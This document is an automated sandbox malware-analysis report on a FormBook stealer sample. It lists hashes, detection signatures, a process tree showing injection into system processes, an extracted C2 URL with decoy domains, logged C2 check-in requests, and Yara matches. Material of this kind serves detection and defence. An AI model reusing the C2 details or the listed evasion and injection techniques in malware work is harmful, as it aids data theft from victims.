Analysis Report SecuriteInfo.com.Trojan.Packed2.43183.29557.7257

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.Packed2.43183.29557.7257 (renamed file extension from 7257 to exe)
Analysis ID: 432683
MD5: 4e9095ceadd56bc68a99947ab929f691
SHA1: bce676ea49fb6709dc0e9a23df2e918e05b4074b
SHA256: 1fe427cfa805bbabdc371ae3f6ccea4088ca76e8b9fce9828a74885d72339020
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains very large array initializations
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Trojan.Packed2.43183.29557.exe (PID: 6916 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe' MD5: 4E9095CEADD56BC68A99947AB929F691)
    • AddInProcess32.exe (PID: 6200 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • systray.exe (PID: 2108 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
          • cmd.exe (PID: 4812 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.roamallday.com/sadn/"], "decoy": ["blessonschool.com", "lydialondon.com", "evln.xyz", "mychallengeiam.com", "stealthshop.net", "amybrownwhiteconsulting.info", "pakistanwholesaler.com", "authenticcase.com", "timothymaina.com", "kiem-etre.com", "thslot39.com", "tripprivee.com", "timeforbusinessblog.xyz", "afgecouncil100.com", "automotivesupplierdc.com", "thebigfoottheory.com", "resocoin.com", "healthepartner.com", "kkrazzybazar.com", "stgwxq.com", "tech4thelolo.com", "smshare2u.com", "mow-it-now.com", "seemymiamihome.com", "urbanadultstore.com", "tmvh8.com", "livelifelocalpublications.com", "blaxies3.com", "hotlab.info", "axmpjbwqh.icu", "lileshop.com", "genariofficial.com", "vibeofthetribe.com", "tldyyl.com", "dapurbuageung.com", "murrayburngundogs.com", "hertsandlondonknee.com", "mcfarline.com", "chicskr.com", "producepatties.com", "026lw.com", "humblehomeus.com", "accukoopje.com", "tantnewsgarre.website", "okettnet.net", "mattwilborne.info", "granthamrobotics.com", "theinfluenceprogram.net", "pointmortgageservicing.com", "garantiservice.com", "bossesbuildbusinesscredit.com", "oselsoft.xyz", "lareleverh.com", "mirzaissa-realtor.com", "tourneyphotos.com", "handpickednurse.com", "guiaconservador.com", "theliftquotient.com", "linkalto.com", "cosmoandcocrafts.com", "wzcp09.com", "mclpay.com", "jobjiihnb.club", "sudesheranga.com"]}

Yara Overview

Memory Dumps

Source: 00000001.00000002.737256043.00000000037CC000.00000004.00000001.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 00000001.00000002.737256043.00000000037CC000.00000004.00000001.sdmp, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.737256043.00000000037CC000.00000004.00000001.sdmp, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.803111095.0000000001290000.00000040.00000001.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 0000000B.00000002.803111095.0000000001290000.00000040.00000001.sdmp, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com

      Unpacked PEs

      Source: 11.0.AddInProcess32.exe.400000.1.unpack, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
      Source: 11.0.AddInProcess32.exe.400000.1.unpack, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 11.0.AddInProcess32.exe.400000.1.unpack, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
      Source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          AV Detection:

          Found malware configuration
          Source: 00000001.00000002.737256043.00000000037CC000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook (configuration identical to the one listed under Malware Configuration above)
          Multi AV Scanner detection for submitted file
          Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, Virustotal: Detection: 33%
          Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, ReversingLabs: Detection: 36%
          Yara detected FormBook
          Source: Yara match, File source: 00000001.00000002.737256043.00000000037CC000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.803111095.0000000001290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.801838633.0000000001180000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000000.725117231.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.737458183.0000000003817000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.738166081.00000000038E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000002.900522638.0000000000330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 11.0.AddInProcess32.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 11.0.AddInProcess32.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sample
          Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, Joe Sandbox ML: detected
          Source: 11.0.AddInProcess32.exe.400000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 11.2.AddInProcess32.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: AddInProcess32.pdb source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000003.722611270.0000000006220000.00000004.00000001.sdmp, AddInProcess32.exe, systray.exe, 00000011.00000002.900574783.0000000000423000.00000004.00000020.sdmp, AddInProcess32.exe.1.dr
          Source: Binary string: systray.pdb source: AddInProcess32.exe, 0000000B.00000002.803736776.0000000001359000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000C.00000000.748974641.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: systray.pdbGCTL source: AddInProcess32.exe, 0000000B.00000002.803736776.0000000001359000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, systray.exe, 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, systray.exe
          Source: Binary string: AddInProcess32.pdbpw source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000003.722611270.0000000006220000.00000004.00000001.sdmp, AddInProcess32.exe, 0000000B.00000000.725190319.0000000000CD2000.00000002.00020000.sdmp, systray.exe, 00000011.00000002.900574783.0000000000423000.00000004.00000020.sdmp, AddInProcess32.exe.1.dr
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000C.00000000.748974641.0000000005A00000.00000002.00000001.sdmp

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 34.102.136.180:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 34.102.136.180:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.roamallday.com/sadn/
          Source: global traffic, HTTP traffic detected: GET /sadn/?5jDxn=9rYPWNexEp&9r8=cvOZMLUYKOYUB2MIVs3brF1aeCykDgyLTnisf2vSTBUNQvDIkJgvRwpKMlOnwLgVr/YP HTTP/1.1; Host: www.granthamrobotics.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /sadn/?9r8=DXfJxxxI+/4CaoDoAzC1V5G6SJQKNuW4mru3KXZlF9SJY6Uq4c9wctugrHKIzz2k7BKt&5jDxn=9rYPWNexEp HTTP/1.1; Host: www.mclpay.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: Joe Sandbox View, IP Address: 13.59.53.244
          Source: unknown, DNS traffic detected: queries for: www.granthamrobotics.com
          Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Thu, 10 Jun 2021 14:59:57 GMT; Content-Type: text/html; Content-Length: 153; Connection: close; Server: nginx/1.16.1; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>

          E-Banking Fraud:

          Yara detected FormBook (Yara match sources identical to those listed under AV Detection above)

          System Summary:

          Malicious sample detected (through community Yara rule)
          Each source below matched two rules: "autogenerated rule brought to you by yara-signator" (Author: Felix Bilstein - yara-signator at cocacoding dot com) and "detect Formbook in memory" (Author: JPCERT/CC Incident Response Group).
          Source: 00000001.00000002.737256043.00000000037CC000.00000004.00000001.sdmp, type: MEMORY
          Source: 0000000B.00000002.803111095.0000000001290000.00000040.00000001.sdmp, type: MEMORY
          Source: 0000000B.00000002.801838633.0000000001180000.00000040.00000001.sdmp, type: MEMORY
          Source: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, type: MEMORY
          Source: 0000000B.00000000.725117231.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: 00000001.00000002.737458183.0000000003817000.00000004.00000001.sdmp, type: MEMORY
          Source: 00000001.00000002.738166081.00000000038E0000.00000004.00000001.sdmp, type: MEMORY
          Source: 00000011.00000002.900522638.0000000000330000.00000004.00000001.sdmp, type: MEMORY
          Source: 11.0.AddInProcess32.exe.400000.1.unpack, type: UNPACKEDPE
          Source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 11.0.AddInProcess32.exe.400000.1.raw.unpack, type: UNPACKEDPE
          .NET source code contains very large array initializations
          Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, j2DC/Rb6y.cs, Large array initialization: .cctor: array initializer size 3852
          Source: 1.0.SecuriteInfo.com.Trojan.Packed2.43183.29557.exe.3a0000.0.unpack, j2DC/Rb6y.cs, Large array initialization: .cctor: array initializer size 3852
          Source: 1.2.SecuriteInfo.com.Trojan.Packed2.43183.29557.exe.3a0000.0.unpack, j2DC/Rb6y.cs, Large array initialization: .cctor: array initializer size 3852
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_004181B0 NtCreateFile,11_2_004181B0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_00418260 NtReadFile,11_2_00418260
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_004182E0 NtClose,11_2_004182E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_00418390 NtAllocateVirtualMemory,11_2_00418390
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_004181AA NtCreateFile,11_2_004181AA
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_0041825A NtReadFile,11_2_0041825A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_004182E2 NtClose,11_2_004182E2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_017F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_017F9910
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_017F99A0 NtCreateSection,LdrInitializeThunk,11_2_017F99A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_017F9860 NtQuerySystemInformation,LdrInitializeThunk,11_2_017F9860
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_017F9840 NtDelayExecution,LdrInitializeThunk,11_2_017F9840
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_017F98F0 NtReadVirtualMemory,LdrInitializeThunk,11_2_017F98F0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_017F9A50 NtCreateFile,LdrInitializeThunk,11_2_017F9A50
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_017F9A20 NtResumeThread,LdrInitializeThunk,11_2_017F9A20
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_017F9A00 NtProtectVirtualMemory,LdrInitializeThunk,11_2_017F9A00
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F9540 NtReadFile,LdrInitializeThunk,11_2_017F9540
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F95D0 NtClose,LdrInitializeThunk,11_2_017F95D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F9710 NtQueryInformationToken,LdrInitializeThunk,11_2_017F9710
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F9FE0 NtCreateMutant,LdrInitializeThunk,11_2_017F9FE0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F97A0 NtUnmapViewOfSection,LdrInitializeThunk,11_2_017F97A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F9780 NtMapViewOfSection,LdrInitializeThunk,11_2_017F9780
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F9660 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_017F9660
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F96E0 NtFreeVirtualMemory,LdrInitializeThunk,11_2_017F96E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F9950 NtQueueApcThread,11_2_017F9950
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F99D0 NtCreateProcessEx,11_2_017F99D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017FB040 NtSuspendThread,11_2_017FB040
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F9820 NtEnumerateKey,11_2_017F9820
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F98A0 NtWriteVirtualMemory,11_2_017F98A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F9B00 NtSetValueKey,11_2_017F9B00
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017FA3B0 NtGetContextThread,11_2_017FA3B0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F9A10 NtQuerySection,11_2_017F9A10
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F9A80 NtOpenDirectoryObject,11_2_017F9A80
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F9560 NtWriteFile,11_2_017F9560
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017FAD30 NtSetContextThread,11_2_017FAD30
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F9520 NtWaitForSingleObject,11_2_017F9520
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F95F0 NtQueryInformationFile,11_2_017F95F0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017FA770 NtOpenThread,11_2_017FA770
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F9770 NtSetInformationFile,11_2_017F9770
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F9760 NtOpenProcess,11_2_017F9760
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F9730 NtQueryVirtualMemory,11_2_017F9730
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017FA710 NtOpenProcessToken,11_2_017FA710
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F9670 NtQueryInformationProcess,11_2_017F9670
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F9650 NtQueryValueKey,11_2_017F9650
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F9610 NtEnumerateValueKey,11_2_017F9610
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F96D0 NtCreateKey,11_2_017F96D0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B9540 NtReadFile,LdrInitializeThunk,17_2_045B9540
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B95D0 NtClose,LdrInitializeThunk,17_2_045B95D0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B9650 NtQueryValueKey,LdrInitializeThunk,17_2_045B9650
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B9660 NtAllocateVirtualMemory,LdrInitializeThunk,17_2_045B9660
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B96D0 NtCreateKey,LdrInitializeThunk,17_2_045B96D0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B96E0 NtFreeVirtualMemory,LdrInitializeThunk,17_2_045B96E0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B9710 NtQueryInformationToken,LdrInitializeThunk,17_2_045B9710
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B9FE0 NtCreateMutant,LdrInitializeThunk,17_2_045B9FE0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B9780 NtMapViewOfSection,LdrInitializeThunk,17_2_045B9780
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B9840 NtDelayExecution,LdrInitializeThunk,17_2_045B9840
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B9860 NtQuerySystemInformation,LdrInitializeThunk,17_2_045B9860
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,17_2_045B9910
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B99A0 NtCreateSection,LdrInitializeThunk,17_2_045B99A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B9A50 NtCreateFile,LdrInitializeThunk,17_2_045B9A50
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B9560 NtWriteFile,17_2_045B9560
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045BAD30 NtSetContextThread,17_2_045BAD30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B9520 NtWaitForSingleObject,17_2_045B9520
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B95F0 NtQueryInformationFile,17_2_045B95F0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B9670 NtQueryInformationProcess,17_2_045B9670
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B9610 NtEnumerateValueKey,17_2_045B9610
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045BA770 NtOpenThread,17_2_045BA770
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B9770 NtSetInformationFile,17_2_045B9770
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B9760 NtOpenProcess,17_2_045B9760
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045BA710 NtOpenProcessToken,17_2_045BA710
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B9730 NtQueryVirtualMemory,17_2_045B9730
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B97A0 NtUnmapViewOfSection,17_2_045B97A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045BB040 NtSuspendThread,17_2_045BB040
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B9820 NtEnumerateKey,17_2_045B9820
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B98F0 NtReadVirtualMemory,17_2_045B98F0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B98A0 NtWriteVirtualMemory,17_2_045B98A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B9950 NtQueueApcThread,17_2_045B9950
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B99D0 NtCreateProcessEx,17_2_045B99D0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B9A10 NtQuerySection,17_2_045B9A10
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B9A00 NtProtectVirtualMemory,17_2_045B9A00
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B9A20 NtResumeThread,17_2_045B9A20
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B9A80 NtOpenDirectoryObject,17_2_045B9A80
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045B9B00 NtSetValueKey,17_2_045B9B00
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045BA3B0 NtGetContextThread,17_2_045BA3B0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_02CD82E0 NtClose,17_2_02CD82E0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_02CD8260 NtReadFile,17_2_02CD8260
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_02CD8390 NtAllocateVirtualMemory,17_2_02CD8390
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_02CD81B0 NtCreateFile,17_2_02CD81B0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_02CD82E2 NtClose,17_2_02CD82E2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_02CD825A NtReadFile,17_2_02CD825A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_02CD81AA NtCreateFile,17_2_02CD81AA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exeCode function: 1_2_0662237C CreateProcessAsUserW,1_2_0662237C
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: String function: 017BB150 appears 54 times
          Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 0457B150 appears 69 times
          Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exeBinary or memory string: OriginalFilename vs SecuriteInfo.com.Trojan.Packed2.43183.29557.exe
          Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000002.731064405.00000000003A2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameStudent.exe0 vs SecuriteInfo.com.Trojan.Packed2.43183.29557.exe
          Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000002.731731070.0000000002801000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPe6.dll" vs SecuriteInfo.com.Trojan.Packed2.43183.29557.exe
          Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000002.737040753.0000000003758000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSHCore1.dll0 vs SecuriteInfo.com.Trojan.Packed2.43183.29557.exe
          Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000003.722611270.0000000006220000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAddInProcess32.exeT vs SecuriteInfo.com.Trojan.Packed2.43183.29557.exe
          Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000002.740459563.00000000062B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs SecuriteInfo.com.Trojan.Packed2.43183.29557.exe
          Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000002.740075320.0000000005770000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs SecuriteInfo.com.Trojan.Packed2.43183.29557.exe
          Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exeBinary or memory string: OriginalFilenameStudent.exe0 vs SecuriteInfo.com.Trojan.Packed2.43183.29557.exe
          Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000001.00000002.737256043.00000000037CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.737256043.00000000037CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.803111095.0000000001290000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.803111095.0000000001290000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.801838633.0000000001180000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
